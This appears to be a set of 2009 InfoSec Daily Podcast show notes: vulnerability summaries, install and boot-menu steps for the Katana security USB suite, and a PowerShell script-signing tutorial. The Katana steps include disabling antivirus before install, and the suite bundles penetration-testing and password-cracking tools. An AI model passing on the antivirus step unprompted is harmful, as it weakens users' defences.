InfoSec Daily Podcast

1. Microsoft Internet Explorer 8 Cross-Site Scripting Filter Cross-Site Scripting Vulnerability – Microsoft Internet Explorer is prone to a cross-site scripting vulnerability because of a design flaw in the browser’s cross-cite scripting filter. An attacker can exploit this issue to execute arbitrary script code in the context of the user running the application and to steal cookie-based authentication credentials and other sensitive data that may aid in further attacks. Internet Explorer 8 is vulnerable.
2. Mozilla Firefox Remote Memory Corruption Vulnerability – Mozilla Firefox is prone to a remote memory-corruption vulnerability. Successful exploits may allow an attacker to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
3. Mozilla Firefox and SeaMonkey Download Filename Spoofing Vulnerability – Mozilla Firefox and SeaMonkey are prone to a spoofing vulnerability. Attackers can exploit this issue to spoof the filenames displayed in the download dialog box and trick a user into downloading executable files. Updates are available.
4. Mozilla Firefox ‘document.getSelect’ Cross Domain Information Disclosure Vulnerability – Mozilla Firefox is prone to a cross-domain information-disclosure vulnerability because the application fails to properly enforce the same-origin policy. An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information that may aid in further attacks.
5. Microsoft Internet Explorer ‘Style’ Object Remote Code Execution Vulnerability – Microsoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer. Failed attacks may cause denial-of-service conditions. Internet Explorer 6 and 7 on Windows XP and Vista are vulnerable; other versions may also be affected.
6. CA eTrust PestPatrol Anti-Spyware ‘ppctl.dl’ ActiveX Control Remote Buffer Overflow Vulnerability – CA eTrust PestPatrol Anti-Spyware ‘ppctl.dl’ ActiveX control is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
   

InfoSec Daily Podcast

Tech Segment:
Hack from a Cave have released Katana which is a 5GB Portable Multi-Boot Security Suite is designed to fulfill many of your computer security needs. The idea behind this tool is to bring together many of the best security distributions and applications to run from one USB Flash Drive. Instead of keeping track of dozens of CDs and DVDs loaded with your favorite security tools, you can keep them all conveniently in your pocket.

Katana includes distributions which focus on Penetration Testing, Auditing, Password Cracking, Forensics and Honey Pots. Katana comes with over 100 portable Windows applications, such as Wireshark, HiJackThis, Unstoppable Copier, Firefox, and OllyDBG. It also includes the following distributions:

* Backtrack 4 pre
* the Ultimate Boot CD
* Ophcrack Live
* Damn Small Linux
* the Ultimate Boot CD for Windows
* Got Root? Slax
* Organizational Systems Wireless Auditor (OSWA) Assistant
* Damn Vulnerable Linux

According to their website “Ultimate Boot CD is completely free for the download, or could be obtained for a small fee. If you had somehow paid a ridiculous amount of money for it, you have most likely been fleeced. The least you could do is to make as many copies of the offical UBCD and pass it to your friends, relatives, colleagues or even complete strangers to minimize the per unit cost of your loss”

BackTrack is the most top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes.

Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

DSL was originally developed as an experiment to see how many usable desktop applications can fit inside a 50MB live CD. It was at first just a personal tool/toy. But over time Damn Small Linux grew into a community project with hundreds of development hours put into refinements including a fully automated remote and local application installation system and a very versatile backup and restore system which may be used with any writable media including a hard drive, a floppy drive, or a USB device.

UBCD4Win is a bootable recovery CD that contains software used for repairing, restoring, or diagnosing almost any computer problem. Our goal is to be the most complete and easy to use free computer diagnostic tool. Almost all software included in UBCD4Win are freeware utilities for Windows®. Some of the tools inlcuded are “free for personal use” copies so users need to respect these licenses. A few of the tools included in UBCD4Win are paid for and licensed software owned by UBCD4win.

Got Root? Slax – Developed to accompany Katana. All modules in the “slax/modules” directory were added to Slax 6 excluding those starting with numbers. The modules were obtained from the Slax official website here. The 3-003-desktop.lzm module was unpacked and modified to add the Got Root? Slax wallpaper.

The OSWA-Assistant™ is a freely-downloadable, self-contained, wireless-auditing toolkit for both IT-security professionals and End-users alike.

Damn Vulnerable Linux provides with a high sophisticated training trail an ultimate way to show your proven excellence in the field of Reverse Code Engineering and Hacking in various IT security relevant knowledge domains to address the many challenges of software protection, malware, or exploitation analysis.

Katana is also highly customizable. You can modify Katana by adding or removing distributions and portable apps with ease. You can add functionality to distributions like the Ultimate Boot CD, Got Root? Slax and UBCD4Win. You can also load your personal scripts and documents to keep them conveniently on your flash drive to use in concert with the provided tools. You can even use the install script to install Katana on a hard disk. The current boot loader for that disk will be replaced with the syslinux boot loader. The disk must be a FAT32 filesystem.

So what are the requirements for Katana?

1. Requires USB flash drive of size 8GB or larger with 6GB free space. (NOTE: You can install Katana on smaller drives by uninstalling some distributions. See step 4.)

2. Download katana-v1.rar to local disk. Full install requires 6 GB of free disk space on local downloading system. (NOTE: FAT16/FAT32 partitions cannot accommodate a 6GB file.)

3. Flash drive must be formatted FAT32. (OPTIONAL: Create “katana” directory on local disk.)

4. (Turn off your virus scanner before install) Extract katana-v1.rar to the “katana” directory and move to USB flash drive OR extract directly to the root of the flash drive. Now you can run the uninstall_tools.bat or uninstall_tools.sh script in “boot/uninstall/” directory if you wish to remove any distributions. This can also be done after installation.

5. Change directory to the freshly copied /boot directory on the USB device. Make sure you’re in the “boot” directory on the USB device!

6. For Linux/OSX run ./boostinst.sh, for Windows run ./boostinst.bat

7. Make sure computer BIOS allows USB boot. Boot from flash drive.

You want to add another distro to Katana? Adding an operating system to Katana can vary in difficulty. Many Live CD operating systems use isolinux as a bootloader. The USB version of this bootloader is syslinux. If these are the bootloader used for the distribution you wish to install, the following information should help in this task.

1) Extract or burn the operating system image.

2) Create the directory /boot/syslinux/”Distro Name” so that we have a folder for storing the Kon-boot. Make sure there are not spaces in the name.). Copy the content of the /boot directory from the extracted/burned ISO to this newly created directory.

3) Copy the config file (w/ the .cfg extension) from the /syslinux or /isolinux directory of the extracted/burned ISO to the /boot/menu directory in Katana. Change the name of the config file to “Distro Name”.cfg. Open the “Distro Name”.cfg file with a text editor.

Edit the text following KERNEL and APPEND in the config file. It should look something like the following. Change the path for the kernal and initrd to /boot/syslinux/”distro name”.

For example, change …

LABEL BT4
MENU LABEL FrameBuffer (1024×768)
KERNEL /boot/vmlinuz
APPEND vga=0×317 initrd=/boot/initrd.gz BOOT=casper boot=casper nopersistent rw quiet

to …

LABEL BT4
MENU LABEL FrameBuffer (1024×768)
KERNEL /boot/syslinux/”Distro Name”/vmlinuz

APPEND vga=0×317 initrd=/boot/syslinux/”Distro Name/initrd.gz BOOT=casper boot=casper nopersistent rw quiet

Also, add the following to the end of the config file.

MENU LABEL ..
KERNEL /boot/vesamenu.c32
APPEND /boot/menus/main.cfg
TEXT HELP
Back to Main Menu
ENDTEXT
4) Now copy the other folders in the root of the CD or extracted image folder to the root of the Katana Drive. (For Backtrack 4 that would be the bt4 directory).

5) Open the main.cfg file in the /boot/syslinux directory. Add the following text to this file. Edit the parts in bold with the appropriate date.

LABEL “Distro Name”
MENU LABEL “Distro Name”
KERNEL /boot/vesamenu.c32
APPEND /boot/menu/”Distro Name”.cfg

Reboot your system and see if it worked.

In addition, you can change the menu format of the distro boot screen to match that of the rest of Katana. The main.cfg controls the format of the menu. You can replace the “…” with the menu content.

DEFAULT /boot/vesamenu.c32
MENU BACKGROUND /boot/wallpaper.png
MENU WIDTH 30
MENU MARGIN 0
MENU ROWS 12
MENU HELPMSGROW 22
MENU TIMEOUTROW 26
MENU TABMSGROW 27
MENU CMDLINEROW 27
MENU HSHIFT 24
MENU VSHIFT 0

menu color screen 37;40 #00000000 #00000000 none
menu color border 30;44 #00000000 #00000000 none
menu color title 1;36;44 #aaaaaaaa #00000000 none
#menu color unsel 37;44 #ff60CA00 #00000000 none
menu color unsel 37;44 #aaaaaaaa #00000000 none
menu color hotkey 1;37;44 #ff60CA00 #00000000 none
#menu color sel 7;37;40 #ffffffff #00000000 none
menu color sel 7;37;40 #ffffffff #00000000 none
menu color hotsel 1;7;37;40 #ff808080 #ff60CA00 none
menu color scrollbar 30;44 #00000000 #00000000 none

menu color tabmsg 31;40 #aaaaaaaa #00000000 none
menu color cmdmark 1;36;40 #ffff0000 #00000000 none
menu color cmdline 37;40 #aaaaaaaa #00000000 none
menu color pwdborder 30;47 #ffff0000 #00000000 std
menu color pwdheader 31;47 #ffff0000 #00000000 std
menu color pwdentry 30;47 #ffff0000 #00000000 std
menu color timeout_msg 37;40 #aaaaaaaa #00000000 none
menu color timeout 1;37;40 #ffaaaaff #00000000 none
menu color help 37;40 #aaaaaa00 #00000000 none
menu color msg07 37;40 #90ffffff #00000000 std

…

LABEL back
MENU LABEL ..
KERNEL /boot/vesamenu.c32
APPEND /boot/menus/main.cfg
TEXT HELP
Back to Main Menu
ENDTEXT

The menu content generally looks something like:

LABEL …
MENU LABEL …
KERNEL …
APPEND …

Following the instructions provided by ronin, I was able to install Trinity Rescue Kit into Katana.
Trinity Rescue Kit or TRK is a free live Linux distribution that aims specifically at recovery and repair operations on Windows machines, but is equally usable for Linux recovery issues. TRK is a complete commandline based distribution, apart from a few tools like qtparted, links, partition image and midnight commander

1) Download Trinity Rescue Kit ISO from http://trinityhome.org

2) Extract the ISO into a local directory on your system.

3) On your Katana Drive, create the file trinity.cfg in the /boot/menu directory. (This is the menu for Trinity Rescue Kit.) Open trinity.cfg in a text editor and copy and past the following into it:

PROMPT 0
#TIMEOUT 90
DEFAULT /boot/vesamenu.c32
MENU BACKGROUND /boot/wallpaper.png

MENU WIDTH 60
MENU MARGIN 0
MENU ROWS 10
MENU HELPMSGROW 22
MENU TIMEOUTROW 26
MENU TABMSGROW 27
MENU CMDLINEROW 27
MENU HSHIFT 9
MENU VSHIFT 0

menu color screen 37;40 #00000000 #00000000 none
menu color border 30;44 #00000000 #00000000 none
menu color title 1;36;44 #aaaaaaaa #00000000 none
#menu color unsel 37;44 #ff60CA00 #00000000 none
menu color unsel 37;44 #aaaaaaaa #00000000 none
menu color hotkey 1;37;44 #ff60CA00 #00000000 none
#menu color sel 7;37;40 #ffffffff #00000000 none
menu color sel 7;37;40 #ffffffff #00000000 none
menu color hotsel 1;7;37;40 #ff808080 #ff60CA00 none
menu color scrollbar 30;44 #00000000 #00000000 none

menu color tabmsg 31;40 #aaaaaaaa #00000000 none
menu color cmdmark 1;36;40 #ffff0000 #00000000 none
menu color cmdline 37;40 #aaaaaaaa #00000000 none
menu color pwdborder 30;47 #ffff0000 #00000000 std
menu color pwdheader 31;47 #ffff0000 #00000000 std
menu color pwdentry 30;47 #ffff0000 #00000000 std
menu color timeout_msg 37;40 #aaaaaaaa #00000000 none
menu color timeout 1;37;40 #ffaaaaff #00000000 none
menu color help 37;40 #aaaaaa00 #00000000 none
menu color msg07 37;40 #90ffffff #00000000 std

MENU TITLE Trinity Rescue Disk

LABEL trk3
MENU label TRD – default
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1

LABEL 1
MENU label TRD – as bootserver to boot other TRK clients
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 trkbootnet

LABEL 2
MENU label TRD – running from RAM (best >= 512mb, 256mb min)
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 trkinmem

LABEL 3
MENU label TRD – with bigger screenfont
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 normalfont

LABEL 4
MENU label TRD – in simple VGA mode (debugging of kernel output)
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=1 pci=conf1 splash=off

LABEL 5
MENU label TRD – with Belgian keyboard (see docs for other)
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 keyb_be

LABEL 6
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Virusscan all drives (non interactive)
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 virusscan

LABEL 7
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Try more pcmcia and usb nics (when not detected)
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 pcmcia

LABEL 8
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Try more SCSI drivers (when disks not detected)
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 scsidrv

LABEL 9
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – with a secure shell server enabled
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 sshd

LABEL 10
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Execute local scripts on harddrive of PC
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 locscr

LABEL 11
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Fileshare all drives, secured with user
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 smbsec

LABEL 12
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Fileshare all drives as guest, no security
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 smbguest

LABEL 0
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Single user mode
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 runlevel 1

LABEL noacpi
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Acpi=off, noapic PCI=bios (Alternate boot 1)
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose acpi=off noapic pci=bios

LABEL pcinormal
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – Acpi=off, noapic PCI=any (Alternate boot 2)
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose acpi=off noapic

LABEL pciconf1
KERNEL /boot/syslinux/trinity/kernel.trk
MENU label TRD – PCI=conf2 (Alternate boot 3)
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf2

LABEL debug
MENU label TRD – Verbose startup for debugging after initial bootfase
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 debugging

LABEL 18
MENU label TRD – SSH server and run from RAM
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 sshd trkinmem

LABEL 19
MENU label TRD – SSH server, run from RAM, act as a secure fileserver
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 sshd trkinmem smbsec

LABEL 20
MENU label TRD – proxyserver support enabled
KERNEL /boot/syslinux/trinity/kernel.trk
APPEND initrd=/boot/syslinux/trinity/initrd.trk ramdisk_size=49152 root=/dev/ram0 vga=788 splash=verbose pci=conf1 proxy

LABEL back
MENU LABEL ..
KERNEL /boot/vesamenu.c32
APPEND /boot/menus/main.cfg
TEXT HELP
Back to Main Menu
ENDTEXT

4) Create the directory /boot/syslinux/trinity in Katana. Copy the kernel.trk and initrd.trk files into the newly created directory from the extracted ISO.

5) Copy the /trk3 directory from the extracted ISO to the root of Katana.

6) Finally, on the Katana Drive; open /boot/menus/main.cfg in a text editor and add the following to the end of the file. This will add Trinity Rescue Kit to the main boot menu.

LABEL trinity
MENU LABEL Trinity Rescue Kit
KERNEL /boot/vesamenu.c32
APPEND /boot/menus/trinity.cfg
TEXT HELP
More about currently selected:

Trinity Rescue Kit is a distribution
that aims specifically at recovery
and repair operations.
ENDTEXT

You should now be able to boot Trinity Rescue Kit from Katana.

You can download Katana v1 here:http://www.hackfromacave.com/katana.html

InfoSec Daily Podcast

Welcome to the InfoSec Podcast Special Technical Segment on Power Shell Signing. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news and review useful tools that will hopefully provide you a few laughs and a little knowledge.

What is code signing? Code signing is the process of digitally signing files to confirm the author and guarantee that the file has not been altered or corrupted. It’s essentially the same as signing emails: it guarantees that they were actually authored by the person claiming to be the author, and that they weren’t changed after the author signed them. (For more information see Apple’s explanation and Microsoft’s).

How does digital signing work? A digital signature scheme typically consists of three algorithms:

• A key generation algorithm that selects a private key uniformly at random from a set of possible private keys. The algorithm outputs the private key and a corresponding public key.
• A signing algorithm which, given a message and a private key, produces a signature.
• A signature verifying algorithm which given a message, public key and a signature, either accepts or rejects the message’s claim to authenticity.

Two main properties are required. First, a signature generated from a fixed message and fixed private key should verify the authenticity of that message by using the corresponding public key. Secondly, it should be computationally infeasible to generate a valid signature for a party who does not possess the private key.

With public/private key encryption, data that is encrypted by the private key can be decrypted by the public key, so the encryption of the hash (and sometimes the public key, as well) is attached to the file so that the end user can re-calculate the hash and decrypt the signature to verify: a) that it was encrypted by the private key belonging to the author, and b) that the hash matches the hash that the author signed.

What’s all this about keys?

In a Pubkic Key Infrastructure (PKI), the “key” is actually included in an SSL certificate issued to you by a Certificate Authority (CA) who verifies your identity. Verisign introduced the idea of “classes” for certificates, and you can now get free, Class 1 certificates for email signing from most CA’s now (like Twarte), where the only thing they verify is that the person being issued the certificate can send/receive email at that address.

Of course, if you want to verify yourself as the author of code, we want to know more about you than your email address. So to sign code, you need at least a Class 2 certificate, for which proof of identity is required. This typically comes in the form of providing (photos of) your passport, driver’s license and/or other photo ID to verify that you are who you claim to be, and answering a few questions on the phone to validate that you own the phone number provided… or providing tax or other documents to prove the existence of an organization and that you’re qualified to speak for them. There are also additional classes: Class 3, 4, and 5 are extended validation certificates used for servers, software signing, b2b transactions and government security.

Why should I sign PowerShell scripts?

Reality is that you probably don’t need to do so unless you want to provide a mechanism that your code can be verified and was delivered unaltered.  Code-signing gives you a way to do just that by locking down and securing PowerShell scripts.

As an individual, signing doesn’t offer you much unless you share your computer with other administrator users. After all, what it protects you from is intentional or accidental altering of the script. If there’s no one else who has access to your computer, then nobody can alter your scripts.

Of course if you distribute your scripts signing them you (and your users) the assurance that you are the author, and that no one has altered your script.   The main items to take away are that code signing cannot guarantee that code is free of security vulnerabilities.  Doesn’t guarantee that a script doesn’t load unsafe code or perform unsafe actions during execution.

Assuming that you still want to try signing your scripts, you need a certificate. You can also get one from a public Certificate Authority or you can obtain one from an internal Certificate Authority.

The third option for obtaining a code-signing certificate is to make your own self-signed certificate using a tool like Makecert.exe. It ships with the Windows Platform SDK. The upside of a self-signed certificate is that it’s free and doesn’t require any infrastructure. The downside, however, is that it’s really only usable on your computer. But if you just need to enable script execution on your computer—for testing or general experimentation with code signing—Makecert.exe is a great option. Documentation about this tool is at go.microsoft.com/fwlink/?LinkId=108538. Just be aware that many versions of this tool have existed over the years, so it’s possible that your computer is running an older version that doesn’t work exactly as the documentation describes.  For example, for Windows 7 you’ll need the Microsoft Windows SDK for Windows 7 and .NET Framework 3.5 SP1.  http://www.microsoft.com/downloads/details.aspx?FamilyID=c17ba869-9671-4330-a63e-1fd44e0e2505&displaylang=en

You will be prompted for the private key:

Next you’ll be prompted for the private key you entered above:

Now run the following from a Command Prompt.  It generates a personal certificate from the above certificate authority:

C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin>makecert -pe -n “CN=PowerShell
User” -ss MY -a sha1 -eku 1.3.6.1.5.5.7.3.3 -iv root.pvk -ic root.cer
Succeeded

You’ll be prompted for the private key you entered earlier:

This places the self-signed certificate into your personal store.

Now you need to verify from Powershell that the certificate was generated correctly:

PS C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin> Get-ChildItem cert:\Current
User\My -codesign

Directory: Microsoft.PowerShell.Security\Certificate::CurrentUser\My

Thumbprint                                Subject
———-                                ——-
55C746A509308332B66C9CFEE1011F9F64679671  CN=PowerShell User

You delete the two temporary files root.pvk and root.cer in your working directory.  The certificate info is stored with that of others, in “C:\Documents and Settings\[username]\Application Data\Microsoft\SystemCertificates\My\”.

[system.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces() |
Where-Object { $_.GetIPProperties().GatewayAddresses } |
ForEach-Object {
$_.GetIPProperties().UnicastAddresses| ForEach-Object {
$_.Address.IPAddressToString
}
}
# SIG # Begin signature block
# MIIEMwYJKoZIhvcNAQcCoIIEJDCCBCACAQExCzAJBgUrDgMCGgUAMGkGCisGAQQB
# gjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNR
# AgEAAgEAAgEAAgEAAgEAMCEwCQYFKw4DAhoFAAQUMMk7EB96aq7RuaYVZtINR/9P
# bz+gggI9MIICOTCCAaagAwIBAgIQ9GUKJXkjfrFHX4HNvUBqfTAJBgUrDgMCHQUA
# MCwxKjAoBgNVBAMTIVBvd2VyU2hlbGwgTG9jYWwgQ2VydGlmaWNhdGUgUm9vdDAe
# Fw0wOTExMjEwMDQxNTZaFw0zOTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMTD1Bvd2Vy
# U2hlbGwgVXNlcjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAkb4oawAASvMB
# rQ9hLSqaIJMPplCJG8Xh+RYLKL867zEGKtk1M83A+s4+KqFyall9iD8wex9WaUjH
# CQE7K71lsuprJDnAYIwgaxEVoIhMDtXSt5BiKcZdwUFTMHkUppeage9Qx+uR+JXe
# FTPydvus663IEM7t8dROq921/e37KNsCAwEAAaN2MHQwEwYDVR0lBAwwCgYIKwYB
# BQUHAwMwXQYDVR0BBFYwVIAQE43DypIlBMHL15nDtPUsuaEuMCwxKjAoBgNVBAMT
# IVBvd2VyU2hlbGwgTG9jYWwgQ2VydGlmaWNhdGUgUm9vdIIQk7Dn3ps5vaxAUlAJ
# +ZsNSDAJBgUrDgMCHQUAA4GBAFSWkZjKM5j2UyWVkt4egwEyCi9PfzMOU7H38OD9
# KmCdSPFdFwmAfnvTfRiYNJxfCtIy5cRE/tnTqAImXaHeBwMJNGKSHl0a8L2uACni
# mL4FKgL1C+AqBpDkxGmRc0WVTE6w1yQYzqTEpsQPEXWqH+nxTa3juleCw8A8l2+5
# 39uzMYIBYDCCAVwCAQEwQDAsMSowKAYDVQQDEyFQb3dlclNoZWxsIExvY2FsIENl
# cnRpZmljYXRlIFJvb3QCEPRlCiV5I36xR1+Bzb1Aan0wCQYFKw4DAhoFAKB4MBgG
# CisGAQQBgjcCAQwxCjAIoAKAAKECgAAwGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcC
# AQQwHAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwIwYJKoZIhvcNAQkEMRYE
# FHE6mEEs43d776HA5FWueAQRh5arMA0GCSqGSIb3DQEBAQUABIGAVvKHltzyIKsG
# YqxATMTVlyh1yb2pRA8Ar8mmGaB7fSro/LONEjSr0uto11lnixbBNUQCF7bjpeYS
# CUxfNC5pynPhp6nF4XdHwPDb3u0aNNJ9bCtlTN6e3pi3+QP1Fi0aFNVBIGD2Bb4c
# BiY7HRQK/Sgj3N+m9s4xPkVJcKOajRg=
# SIG # End signature block

Execute the script once again:

PS C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin> .\script.ps1

Do you want to run software from this untrusted publisher?
File C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin\script.ps1 is published
by CN=PowerShell User and is not trusted on your system. Only run scripts from
trusted publishers.
[V] Never run  [D] Do not run  [R] Run once  [A] Always run  [?] Help
(default is “D”):r
fe80::c89c:9d2c:15ac:1b87%11
10.25.0.99
fe80::681b:b2c1:bab0:70d5%18
192.168.193.1
fe80::d936:3768:d735:ab%20
192.168.85.1

We get prompted to [V] Never run  [D] Do not run  [R] Run once  [A] Always run  [?] Help (default is “D”).  I selected r and the script ran correctly providing me with the output of my interfaces.  It is important to note that if the certificate is missing from your store the script will fail.

To run signed scripts on another system you have to export the Powershell certificate that was used to sign the script from the Trusted Root Certification Authorities container.  As a side note, the Trusted Publishers can also be moved to prevent the first-time prompt.

From the Current User certificate store, go to the Trusted Root Certification Authorities container and locate the PowerShell Local Certificate Root certificate.  Right-click on it and click All Tasks, Export.

Leave the format at the default DER format and click Next.

Enter your desired path and name of the exported certificate, and click Next.  On the target machine, open certmgr.msc.  Locating the Trusted Root Certification Authorities container.

Expand the container to find the Certificates store.  Right-click on it and select All Tasks, choose import. Click Next to continue and then find the certificate that you just exported and click Next.  I usually choose the Automatically select the certificate store based on the type of certificate.  Read the security warning and click Yes to install the certificate. Your signed script should now run on the new computer.  Note that Powershell will prompt you the first time it’s run unless you also import the Trusted Publishers certificate.

InfoSec Daily Podcast

Tonight we have a Part Two of our interview with special Guest Pieter Swanepoel. Pieter is the President of Swan Security which specializes in Mainframe Security.

InfoSec Daily Podcast

Tonight we have a Part One of our interview with special Guest Pieter Swanepoel. Pieter is the President of Swan Security which specializes in Mainframe Security.

InfoSec Daily Podcast

Vulnerabilities of Interest:

1. VUPEN is reporting that a vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the “getElementsByTagName()” method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.
2. NTP ‘ntpq’ Stack Buffer Overflow Vulnerability – The ‘ntpq’ command is prone to a stack-based buffer-overflow vulnerability.  Successful exploits will crash the affected utility. Code execution may also be possible, but has not been confirmed.
3. Cisco VPN Client “cvpnd” Service Local Denial of Service – A vulnerability has been reported in Cisco VPN Client, which can be exploited by malicious, local users to cause a DoS (Denial of Serivce).   The vulnerability is caused due to an improper error handling within the cvpnd.exe binary, which can be exploited to terminate the cvpnd service with all active VPN sessions. The vulnerability is reported in versions prior to 5.0.06.0100. The solutions is to update to version 5.0.06.0100.
4. Linux Kernel ‘NFS filename’ Local Denial of Service Vulnerability – The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to trigger a kernel oops, resulting in a denial-of-service condition.
5. Linux Kernel ‘exit_notify()’ CAP_KILL Verification Local Privilege Escalation Vulnerability – The Linux kernel is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with superuser privileges, resulting in a complete compromise of the affected computer.Versions prior to Linux kernel 2.6.29-git14 are vulnerable. An exploit is available in the Wild.
6. Linux Kernel CIFS Remote Buffer Overflow Vulnerability – The Linux Kernel is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. The issue affects Linux Kernel 2.6.29; other versions may also be vulnerable.
7. Linux Kernel nfsd ‘CAP_MKNOD’ Unauthorized Access Vulnerability – The Linux Kernel is prone to an unauthorized-access vulnerability that can occur when users with certain capabilities connect to the ‘nfsd’ service. Attacker with authenticated access to the affected application can exploit this issue to perform privileged operations on a vulnerable computer; this may aid in further attacks. Can be exploited by using readily available tools.
8. ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability – ISC BIND is prone to a remote denial-of-service vulnerability because the software fails to properly handle specially crafted dynamic update requests. Successfully exploiting this issue allows remote attackers to crash affected DNS servers, denying further service to legitimate users. Other attacks are also possible. Versions prior to BIND 9.4.3-P3, 9.5.1-P3, and 9.6.1-P3 are vulnerable. This issue is being actively exploited in the wild.
9. Sun Solaris OpenSSL TLS Session Renegotiation Plaintext Injection Vulnerability -  Sun has acknowledged a vulnerability in Solaris, which can be exploited by malicious people to manipulate certain data. A final resolution is pending completion.

News Items of Interest:

News item 1: (http://www.v3.co.uk/v3/news/2253708/insurers-found-facebook)

News item 2: (http://www.itworldcanada.com/news/reputation-based-security-to-dominate/139392)

News item 3: (http://www.theregister.co.uk/2009/11/20/snow_leopard_atom_support/)

A custom version of OS 10.6.2 distributed here. More about how to install the patch is available from this forum at Insanely Mac.

News item 4: (http://blogs.zdnet.com/green/?p=8783)

News item 5: (http://news.cnet.com/8301-13860_3-10402783-56.html?part=rss&subj=news&tag=2547-1_3-0-20)

News item 6: (http://www.sciencedaily.com/releases/2009/11/091118160627.htm)

News item 6: (http://news.softpedia.com/news/Comcast-Domain-Hijackers-Indicted-127635.shtml)

Tech Segment:

Linkrot scans a site for inaccessible links (http error 404, 500, etc.) and saves a log with bad links that you can open in Excel.  It’s a Windows console application developed in C# (.NET 2.0 stack). Simple, single thread crawling for dead links, broken links, dangling links.

C:\Users\rhayes\Downloads>linkrot

Finds inaccessible links in a website (single thread version).
All links are written to Links.txt.
Bad links are written to Error.txt.

Use:             linkrot.exe <url>
